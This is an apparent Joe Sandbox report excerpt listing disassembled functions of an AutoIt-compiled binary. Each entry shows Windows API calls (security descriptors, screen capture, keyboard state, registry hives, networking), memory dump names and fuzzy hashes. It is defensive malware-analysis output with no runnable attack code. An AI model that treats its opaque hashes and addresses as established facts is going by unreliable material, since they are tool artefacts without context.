                                        Function 00ED83F4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00ED874A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00ED8766
                                          • Part of subcall function 00ED874A: GetLastError.KERNEL32(?,00ED822A,?,?,?), ref: 00ED8770
                                          • Part of subcall function 00ED874A: GetProcessHeap.KERNEL32(00000008,?,?,00ED822A,?,?,?), ref: 00ED877F
                                          • Part of subcall function 00ED874A: RtlAllocateHeap.NTDLL(00000000,?,00ED822A), ref: 00ED8786
                                          • Part of subcall function 00ED874A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00ED879D
                                          • Part of subcall function 00ED87E7: GetProcessHeap.KERNEL32(00000008,00ED8240,00000000,00000000,?,00ED8240,?), ref: 00ED87F3
                                          • Part of subcall function 00ED87E7: RtlAllocateHeap.NTDLL(00000000,?,00ED8240), ref: 00ED87FA
                                          • Part of subcall function 00ED87E7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00ED8240,?), ref: 00ED880B
                                        • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00ED8458
                                        • _memset.LIBCMT ref: 00ED846D
                                        • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00ED848C
                                        • GetLengthSid.ADVAPI32(?), ref: 00ED849D
                                        • GetAce.ADVAPI32(?,00000000,?), ref: 00ED84DA
                                        • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00ED84F6
                                        • GetLengthSid.ADVAPI32(?), ref: 00ED8513
                                        • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00ED8522
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00ED8529
                                        • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00ED854A
                                        • CopySid.ADVAPI32(00000000), ref: 00ED8551
                                        • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00ED8582
                                        • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00ED85A8
                                        • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00ED85BC
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: HeapSecurity$AllocateDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                        • String ID:
                                        • API String ID: 2347767575-0
                                        • Opcode ID: fe7f76114e246ed8213e3046374da47df22d25fd00925e68dd8417e56ac08e79
                                        • Instruction ID: 3b9108c4249c061764936c63d97b23a9605cc2da2bad68b8904f5ea22e37cb1d
                                        • Opcode Fuzzy Hash: fe7f76114e246ed8213e3046374da47df22d25fd00925e68dd8417e56ac08e79
                                        • Instruction Fuzzy Hash: C0614B71900209AFDF10DFA5ED45AAEBBB9FF04314F04816AF815B7291DB319A06DF60
                                        Function 00EF762D Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDC.USER32(00000000), ref: 00EF76A2
                                        • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00EF76AE
                                        • CreateCompatibleDC.GDI32(?), ref: 00EF76BA
                                        • SelectObject.GDI32(00000000,?), ref: 00EF76C7
                                        • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00EF771B
                                        • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00EF7757
                                        • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00EF777B
                                        • SelectObject.GDI32(00000006,?), ref: 00EF7783
                                        • DeleteObject.GDI32(?), ref: 00EF778C
                                        • DeleteDC.GDI32(00000006), ref: 00EF7793
                                        • ReleaseDC.USER32(00000000,?), ref: 00EF779E
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                        • String ID: (
                                        • API String ID: 2598888154-3887548279
                                        • Opcode ID: 0d8c2631dc5dedb8cb6778998077c35c23dbada57827274403c75085e4fd3291
                                        • Instruction ID: 6ba96322f91c9953caa88abea549b3e04c7f11a21e4634d42e77f2a26bdd0b5e
                                        • Opcode Fuzzy Hash: 0d8c2631dc5dedb8cb6778998077c35c23dbada57827274403c75085e4fd3291
                                        • Instruction Fuzzy Hash: AF515E75904209EFCB25CFA8CC84EAEBBB9FF48310F14842DF989A7250D731A844CB50
                                        Function 00EEA0B5 Relevance: 21.2, APIs: 7, Strings: 5, Instructions: 156COMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadStringW.USER32(00000066,?,00000FFF,00F0FB78), ref: 00EEA0FC
                                          • Part of subcall function 00E87F41: _memmove.LIBCMT ref: 00E87F82
                                        • LoadStringW.USER32(?,?,00000FFF,?), ref: 00EEA11E
                                        • __swprintf.LIBCMT ref: 00EEA177
                                        • __swprintf.LIBCMT ref: 00EEA190
                                        • _wprintf.LIBCMT ref: 00EEA246
                                        • _wprintf.LIBCMT ref: 00EEA264
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: LoadString__swprintf_wprintf$_memmove
                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                        • API String ID: 311963372-2391861430
                                        • Opcode ID: 3b8e67e72888b4875cd1840a3e735c95fe2e5e4c1cbc7b0fa15b3b767c4f1f6c
                                        • Instruction ID: 910718ba1e28899ab2263696ddf29d941ba011118c3518345a50d45273729973
                                        • Opcode Fuzzy Hash: 3b8e67e72888b4875cd1840a3e735c95fe2e5e4c1cbc7b0fa15b3b767c4f1f6c
                                        • Instruction Fuzzy Hash: 9251607190420DAACF15FBE0CD86EEEB7B8AF19304F241165F509720A1EB71AF58DB61
                                        Function 00E86BEC Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00EA0B9B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00E86C6C,?,00008000), ref: 00EA0BB7
                                          • Part of subcall function 00E848AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00E848A1,?,?,00E837C0,?), ref: 00E848CE
                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00E86D0D
                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00E86E5A
                                          • Part of subcall function 00E859CD: _wcscpy.LIBCMT ref: 00E85A05
                                          • Part of subcall function 00EA387D: _iswctype.LIBCMT ref: 00EA3885
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                        • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                        • API String ID: 537147316-1018226102
                                        • Opcode ID: ddf9c45ce436ae95047501d5e0b314379a9ac2140c9e02d825a1a5d28fcfb21c
                                        • Instruction ID: 1e098d1257753c0d52bc39760599b1aa74e48b95daddb3aa781e0b70df4139c8
                                        • Opcode Fuzzy Hash: ddf9c45ce436ae95047501d5e0b314379a9ac2140c9e02d825a1a5d28fcfb21c
                                        • Instruction Fuzzy Hash: 43028C711083419FC724EF24C881AAFBBE5AF99354F14691DF4CEA72A1DB30DA49DB42
                                        Function 00E845DF Relevance: 19.7, APIs: 13, Instructions: 215windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • _memset.LIBCMT ref: 00E845F9
                                        • GetMenuItemCount.USER32(00F46890), ref: 00EBD7CD
                                        • GetMenuItemCount.USER32(00F46890), ref: 00EBD87D
                                        • GetCursorPos.USER32(?), ref: 00EBD8C1
                                        • SetForegroundWindow.USER32(00000000), ref: 00EBD8CA
                                        • TrackPopupMenuEx.USER32(00F46890,00000000,?,00000000,00000000,00000000), ref: 00EBD8DD
                                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00EBD8E9
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow_memset
                                        • String ID:
                                        • API String ID: 2751501086-0
                                        • Opcode ID: 6032841d8f4df762802bfd9536e6bc08c6aa4f4cff35378c8ba561768759cc0a
                                        • Instruction ID: 059d87070c489a07f1e652c6c18a15c362cbc9280f8329e241c701844e0d531e
                                        • Opcode Fuzzy Hash: 6032841d8f4df762802bfd9536e6bc08c6aa4f4cff35378c8ba561768759cc0a
                                        • Instruction Fuzzy Hash: 4B71E57060421ABEEB319F15DC45FEABF69FF05368F241216F618B61E0DBB15810EB94
                                        Function 00F010A5 Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                        Download Yara Rule
                                        APIs
                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F00038,?,?), ref: 00F010BC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: BuffCharUpper
                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                        • API String ID: 3964851224-909552448
                                        • Opcode ID: a3ff92cb1cf77273963ed297fb0d0ba7e6faff169f6003a48f2725eb55a0e534
                                        • Instruction ID: 85924ce4f3aed570a893fb6e10a228deb4a364f2635edc88d7be56b56058cd7c
                                        • Opcode Fuzzy Hash: a3ff92cb1cf77273963ed297fb0d0ba7e6faff169f6003a48f2725eb55a0e534
                                        • Instruction Fuzzy Hash: 8E417C7154024E8BDF14EF90DCA1AEA37A5BF2A320F104454FD956B292DB30A91AEB60
                                        Function 00EE5569 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E87D2C: _memmove.LIBCMT ref: 00E87D66
                                          • Part of subcall function 00E87A84: _memmove.LIBCMT ref: 00E87B0D
                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00EE55D2
                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00EE55E8
                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EE55F9
                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00EE560B
                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00EE561C
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: SendString$_memmove
                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                        • API String ID: 2279737902-1007645807
                                        • Opcode ID: b3c77f9304bb68b54acd792140e05da764b92156c96a9b86a802f1604bf9d2a5
                                        • Instruction ID: 985e436b34019d2e24a5f752bb65714130bb6cd405a1dfdf20efda7e7ac85b18
                                        • Opcode Fuzzy Hash: b3c77f9304bb68b54acd792140e05da764b92156c96a9b86a802f1604bf9d2a5
                                        • Instruction Fuzzy Hash: A311E22155016D79D720B663CC8ACFF7BBCEF91F14F501469B448B20D1EE618D05CAA2
                                        Function 00EE48F3 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                        • String ID: 0.0.0.0
                                        • API String ID: 208665112-3771769585
                                        • Opcode ID: 6ee2cf8f5385ed769ad4e99adb45098c4576d92258c7a63f600d5e1445728c5d
                                        • Instruction ID: c81419d2cb6ed62ae2a80404059c431a4c2d9cd590fbc0ac4f07fb245673c314
                                        • Opcode Fuzzy Hash: 6ee2cf8f5385ed769ad4e99adb45098c4576d92258c7a63f600d5e1445728c5d
                                        • Instruction Fuzzy Hash: 5C11057190411DAFCB20EB259C46EDB77ECAB85710F0011B6F504B6092EFB19A85A662
                                        Function 00EE5217 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • timeGetTime.WINMM ref: 00EE521C
                                          • Part of subcall function 00EA0719: timeGetTime.WINMM(?,75C0B400,00E90FF9), ref: 00EA071D
                                        • Sleep.KERNEL32(0000000A), ref: 00EE5248
                                        • EnumThreadWindows.USER32(?,Function_000651CA,00000000), ref: 00EE526C
                                        • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00EE528E
                                        • SetActiveWindow.USER32 ref: 00EE52AD
                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00EE52BB
                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 00EE52DA
                                        • Sleep.KERNEL32(000000FA), ref: 00EE52E5
                                        • IsWindow.USER32 ref: 00EE52F1
                                        • EndDialog.USER32(00000000), ref: 00EE5302
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                        • String ID: BUTTON
                                        • API String ID: 1194449130-3405671355
                                        • Opcode ID: 99db3ef86b03a64cce27802a2d872df3ca0e42fdcfcefe176ae6ef5b7413f9aa
                                        • Instruction ID: 1fe378077799d971ee8f4c6046e09f4d6757b4ab406bd1aef1b664c8b27b41da
                                        • Opcode Fuzzy Hash: 99db3ef86b03a64cce27802a2d872df3ca0e42fdcfcefe176ae6ef5b7413f9aa
                                        • Instruction Fuzzy Hash: BA21F67510474CAFE7106F31EC89B263B69FB2A34EF082424F901E65B5DBB19D04BB62
                                        Function 00EED7F8 Relevance: 18.3, APIs: 12, Instructions: 283comCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 00E89997: __itow.LIBCMT ref: 00E899C2
                                          • Part of subcall function 00E89997: __swprintf.LIBCMT ref: 00E89A0C
                                        • CoInitialize.OLE32(00000000), ref: 00EED855
                                        • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00EED8E8
                                        • SHGetDesktopFolder.SHELL32(?), ref: 00EED8FC
                                        • CoCreateInstance.COMBASE(00F12D7C,00000000,00000001,00F3A89C,?), ref: 00EED948
                                        • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00EED9B7
                                        • CoTaskMemFree.COMBASE(?), ref: 00EEDA0F
                                        • _memset.LIBCMT ref: 00EEDA4C
                                        • SHBrowseForFolderW.SHELL32(?), ref: 00EEDA88
                                        • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00EEDAAB
                                        • CoTaskMemFree.COMBASE(00000000), ref: 00EEDAB2
                                        • CoTaskMemFree.COMBASE(00000000), ref: 00EEDAE9
                                        • CoUninitialize.COMBASE ref: 00EEDAEB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                        • String ID:
                                        • API String ID: 1246142700-0
                                        • Opcode ID: c6533b61ee91cdcbc19a58f547ce00e057e075ad6de96d868aad9c888f898ec9
                                        • Instruction ID: bb59482c625d256dbd6176b0892d904fa22a7b33c876e28e8c243272b83b2042
                                        • Opcode Fuzzy Hash: c6533b61ee91cdcbc19a58f547ce00e057e075ad6de96d868aad9c888f898ec9
                                        • Instruction Fuzzy Hash: 66B1E975A00109AFDB14DFA5CC88DAEBBF9FF48314B149469E909EB251DB30EE45CB50
                                        Function 00EE052C Relevance: 18.2, APIs: 12, Instructions: 186keyboardCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetKeyboardState.USER32(?), ref: 00EE05A7
                                        • SetKeyboardState.USER32(?), ref: 00EE0612
                                        • GetAsyncKeyState.USER32(000000A0), ref: 00EE0632
                                        • GetKeyState.USER32(000000A0), ref: 00EE0649
                                        • GetAsyncKeyState.USER32(000000A1), ref: 00EE0678
                                        • GetKeyState.USER32(000000A1), ref: 00EE0689
                                        • GetAsyncKeyState.USER32(00000011), ref: 00EE06B5
                                        • GetKeyState.USER32(00000011), ref: 00EE06C3
                                        • GetAsyncKeyState.USER32(00000012), ref: 00EE06EC
                                        • GetKeyState.USER32(00000012), ref: 00EE06FA
                                        • GetAsyncKeyState.USER32(0000005B), ref: 00EE0723
                                        • GetKeyState.USER32(0000005B), ref: 00EE0731
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F4E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743818279.0000000000F98000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743836778.0000000000F99000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_e80000_LfZAz7DQzo.jbxd
                                        Similarity
                                        • API ID: State$Async$Keyboard
                                        • String ID:
                                        • API String ID: 541375521-0
                                        • Opcode ID: badd9aa828def223a95a1b8bc44d6a29cdd64372db683193cb4aa836a485d35b
                                        • Instruction ID: d75c2f16423d8d058da6caee4b25bd4691dc1c0452bf4e7d88e7865184d3ed30
                                        • Opcode Fuzzy Hash: badd9aa828def223a95a1b8bc44d6a29cdd64372db683193cb4aa836a485d35b
                                        • Instruction Fuzzy Hash: A251D970A047CC19FB35EBA188547EABFF49F01384F08559A95C2765C2DAE49BCCCB61
                                        Function 00EDC72A Relevance: 18.2, APIs: 12, Instructions: 174COMMON
                                        Download Yara Rule
                                        APIs
                                        • GetDlgItem.USER32(?,00000001), ref: 00EDC746
                                        • GetWindowRect.USER32(00000000,?), ref: 00EDC758
                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 00EDC7B6
                                        • GetDlgItem.USER32(?,00000002), ref: 00EDC7C1
                                        • GetWindowRect.USER32(00000000,?), ref: 00EDC7D3
                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 00EDC827
                                        • GetDlgItem.USER32(?,000003E9), ref: 00EDC835
                                        • GetWindowRect.USER32(00000000,?), ref: 00EDC846
                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 00EDC889
                                        • GetDlgItem.USER32(?,000003EA), ref: 00EDC897
                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00EDC8B4
                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 00EDC8C1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1743670524.0000000000E81000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true
                                        • Associated: 00000000.00000002.1743647582.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1743670524.0000000000F3F000.00000040.00000001.01000000.00000003.sdmpDownload File
